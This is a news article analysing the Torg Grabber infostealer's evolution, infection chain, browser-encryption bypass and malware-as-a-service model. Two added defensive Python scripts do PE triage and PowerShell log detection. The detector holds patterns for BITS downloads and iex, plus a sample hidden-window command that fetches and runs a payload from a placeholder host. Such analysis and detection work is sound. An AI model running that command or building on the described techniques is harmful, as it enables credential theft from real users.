NEWS: From a Telegram bot to a criminal empire in 90 days. How an infostealer grew to 40 operators and hundreds of victims

pinkman

Hackers created new malware from scratch, and researchers observed every day of its evolution.

A malware sample that was at first mistaken for the well-known Vidar infostealer turned out to hold a completely different story. Behind the misattribution was a new data-theft tool called Torg Grabber. Over 3 months, researchers collected 334 samples and tracked how a primitive prototype quickly turned into a full-fledged criminal service with its own infrastructure, control panel and dozens of operators.

The first thing that alerted analysts was the mismatch in basic characteristics. The binary weighed about 747 kilobytes, was built as a 64-bit executable with MinGW/GCC and used a different control protocol; Vidar has a different structure and tooling. Inside, a debug marker reading grabber v1.0 was found, and network communication was built on a REST API with ChaCha20 encryption and HMAC-SHA256 authentication. Comparison with other stealers such as StealC also produced no match. In the end it became clear that this was a new development.
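The kind of first-pass static triage that surfaces such mismatches (bitness, toolchain hints, an embedded debug marker) can be scripted with the standard library alone. The following is an added example written for this post, not code from the article or from the researchers; the PE bytes it inspects are constructed inline as a stand-in, and the MinGW/MSVC string patterns are assumptions chosen for illustration.

```python
"""Static triage of a Windows PE: bitness, toolchain hints, debug strings.

Added example for this post (not the article's or the researchers' code).
It shows how a 64-bit MinGW/GCC build carrying a 'grabber v1.0' marker can be
told apart from what a family signature may have mislabelled. Standard
library only; the sample PE bytes below are constructed, not a real binary.
"""
import re
import struct

IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_I386 = 0x014C

# Toolchain hints (assumed patterns: common MinGW runtime / MSVC runtime names).
COMPILER_HINTS = {
    "mingw": re.compile(rb"mingw|libgcc|__gxx_personality", re.I),
    "msvc": re.compile(rb"Microsoft \(R\)|MSVCR|VCRUNTIME", re.I),
}
# Debug marker pattern generalised from the 'grabber v1.0' string in the article.
DEBUG_MARKER = re.compile(rb"grabber v\d+\.\d+", re.I)


def pe_machine(data: bytes):
    """Return the COFF Machine field, or None if the buffer is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return machine


def ascii_strings(data: bytes, min_len: int = 6):
    """Printable ASCII runs of at least min_len bytes (a minimal 'strings')."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage(data: bytes) -> dict:
    """Summarise the properties an analyst would compare against a family profile."""
    machine = pe_machine(data)
    joined = b"\n".join(ascii_strings(data))
    hints = [name for name, rx in COMPILER_HINTS.items() if rx.search(joined)]
    marker = DEBUG_MARKER.search(joined)
    return {
        "is_pe": machine is not None,
        "is_x64": machine == IMAGE_FILE_MACHINE_AMD64,
        "size_kb": round(len(data) / 1024, 1),
        "compiler_hints": hints,
        "debug_marker": marker.group().decode() if marker else None,
    }


def build_sample() -> bytes:
    """Constructed stand-in: minimal MZ/PE headers followed by a few strings."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> PE signature at 0x40
    coff = b"PE\0\0" + struct.pack("<H", IMAGE_FILE_MACHINE_AMD64) + b"\0" * 18
    payload = b"\0" * 16 + b"grabber v1.0\0" + b"libgcc_s_seh-1.dll\0" + b"random junk"
    return bytes(dos) + coff + payload


if __name__ == "__main__":
    print(triage(build_sample()))
```

On a real file, read it with `open(path, "rb").read()` and pass the bytes to `triage`; a 64-bit image, MinGW-only hints and a `grabber vX.Y` marker together are the profile the article describes, and a signature hit for a family with a different toolchain is then worth a second look.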

The evolution of Torg Grabber is clearly visible. At an early stage, the malware acted as simply as possible: the data was collected, packed into a ZIP archive and sent to private Telegram channels through the Bot API. There was no encryption beyond standard TLS, and if the upload failed, the program could send the information in plain text as a message. This scheme required minimal cost, but was easily detected and quickly blocked.

After a few days the developers tried a different approach: their own binary protocol over TCP. The program opened a connection to a remote server and transmitted data encrypted with ChaCha20-Poly1305. Packets were split into 64-kilobyte blocks, and an integrity check via SHA-256 was added. The solution looked technically neat but turned out to be too difficult to scale; the idea was abandoned after 4 builds.

Then the main phase began. The malware switched to a REST API over HTTPS and received a full-fledged server side. On startup, Torg Grabber registers with the control server via a request to /api/auth, transmits a system fingerprint (graphics card, hardware identifier, list of installed antivirus products) and receives a configuration. Then the stolen data is transferred in parts, with each request authenticated. Traffic often passes through Cloudflare, which makes blocking more difficult.

Functionality grew rapidly. The size of the binary almost doubled and additional modules appeared. One of the key components is a DLL for bypassing Application-Bound Encryption, which Google has shipped in Chrome since version 127. This mechanism binds encryption keys to the browser process itself to protect credentials. Torg Grabber gets around it by injecting code into memory and accessing the COM interfaces of the Elevation Service, obtaining the master key and decrypting the stores of passwords, cookies and other data.

The infection process is built as a chain of several stages. First, the user encounters a lure: fake game cheats, cracked software or a fake notification page. One common scenario is an attack through the clipboard: the malicious page copies a PowerShell command and prompts the user to paste and run it manually. Once launched, the command downloads the next stage through the Background Intelligent Transfer Service, a regular Windows mechanism that rarely arouses suspicion.

Next, a loader disguised as an installer or update runs. It unpacks additional components, applies several layers of encryption and obfuscation and gradually deploys the main module into memory. The malicious code does not write the final executable to disk but loads it directly into RAM, which makes detection by classical means harder.
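The pasted-PowerShell-then-BITS chain described above leaves a footprint in PowerShell script-block logging that a scoring rule can pick up while leaving legitimate admin use of BITS alone. The following is an added example written for this post, not the article's code or any vendor's detection: the event fields, the indicator weights and the three sample log lines are constructed assumptions, and the lure URL is a placeholder.

```python
"""Score PowerShell script-block events for the clipboard -> PowerShell -> BITS
chain. Added example for this post (not the article's or a vendor's rule).
Event layout, weights and the sample lines are assumptions for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    source: str  # assumed label, e.g. "PowerShell/4104" for a script block
    user: str
    text: str


# Weighted indicators; no single one is enough, the chain as a whole alerts.
INDICATORS = [
    ("bits_download", re.compile(r"Start-BitsTransfer|bitsadmin(\.exe)?\s+/transfer", re.I), 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("inline_exec", re.compile(r"\biex\b|Invoke-Expression", re.I), 2),
    ("encoded_cmd", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
]
THRESHOLD = 5  # assumed: BITS alone (3) stays below it, BITS + hidden window crosses it


def score_event(ev: Event):
    """Return (score, list of indicator names that matched) for one event."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(ev.text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def detect(events):
    """Return one alert dict per event whose score reaches THRESHOLD."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= THRESHOLD:
            alerts.append({"user": ev.user, "source": ev.source,
                           "score": score, "hits": hits})
    return alerts


# Constructed sample events: one lure-style command, two benign ones.
SAMPLE_EVENTS = [
    Event("PowerShell/4104", "alice",
          'powershell -w hidden -c "Start-BitsTransfer -Source '
          'https://EXAMPLE-LURE.invalid/u.bin -Destination $env:TEMP\\u.exe; iex ..."'),
    Event("PowerShell/4104", "bob",
          "Get-ChildItem C:\\Users\\bob\\Documents | Measure-Object"),
    Event("PowerShell/4104", "carol",
          "Start-BitsTransfer -Source https://intranet.example/installer.msi "
          "-Destination C:\\Temp"),
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Script-block logging (event 4104) has to be enabled for these lines to exist at all; with it on, the rule fires on the lure-style command (BITS transfer plus a hidden window plus inline execution) and stays quiet on the intranet installer download, which is the separation a threshold is for.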

After activation, Torg Grabber collects data from a wide range of sources. The list includes 25 Chromium-based browsers, 8 Firefox variants, about 850 extensions, as well as Discord, Steam, Telegram, VPN clients, FTP credentials, mail clients and crypto wallets. The program can take screenshots, collect files from the desktop and the Documents folder and, if necessary, download and execute additional code from the control server.

The distribution architecture is of particular interest. The same binary is used by different operators; settings are passed through environment variables set at the infection stage. This approach means the malware does not have to be rebuilt for each client. In effect, this is a Malware-as-a-Service model, where the developer provides the tool and operators use it for their own tasks.

Analysis of the binaries made it possible to extract more than 40 operator identifiers. Among them are pseudonyms, build dates and numeric IDs that match Telegram accounts. Through these identifiers the control panel routes notifications about received data. Some of the accounts were linked to the Russian-speaking cybercrime scene.

The campaign infrastructure is also split by role. Some domains are responsible for delivering loaders, others for running the control server. This scheme increases resilience: blocking one segment does not stop the whole operation. Servers are registered for short periods, use free certificates and change often.

In the end, Torg Grabber illustrates a trend typical of recent years. Malicious software is developed not as a single tool but as a service with a fast update cycle, a modular architecture and distributed infrastructure. In a few months the project went from a simple Telegram-based prototype to a complex system combining modern cryptography, browser-protection bypasses and a scalable distribution model.